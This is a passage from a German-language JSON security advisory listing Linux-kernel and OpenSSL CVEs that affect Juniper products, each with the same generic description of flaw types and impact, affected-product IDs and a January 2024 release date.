Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-0394" }, { "cve": "CVE-2023-0386", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-0386" }, { "cve": "CVE-2023-0286", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-0286" }, { "cve": "CVE-2023-0266", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-0266" }, { "cve": "CVE-2022-47929", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-47929" }, { "cve": "CVE-2022-43945", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-43945" }, { "cve": "CVE-2022-4378", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-4378" }, { "cve": "CVE-2022-43750", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-43750" }, { "cve": "CVE-2022-42896", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-42896" }, { "cve": "CVE-2022-42722", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-42722" }, { "cve": "CVE-2022-42721", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-42721" }, { "cve": "CVE-2022-42720", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-42720" }, { "cve": "CVE-2022-42703", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-42703" }, { "cve": "CVE-2022-4269", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-4269" }, { "cve": "CVE-2022-4254", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-4254" }, { "cve": "CVE-2022-41974", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-41974" }, { "cve": "CVE-2022-41674", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-41674" }, { "cve": "CVE-2022-4139", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-4139" }, { "cve": "CVE-2022-4129", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-4129" }, { "cve": "CVE-2022-41222", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-41222" }, { "cve": "CVE-2022-41218", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-41218" }, { "cve": "CVE-2022-39189", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-39189" }, { "cve": "CVE-2022-39188", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-39188" }, { "cve": "CVE-2022-38023", "notes": [ 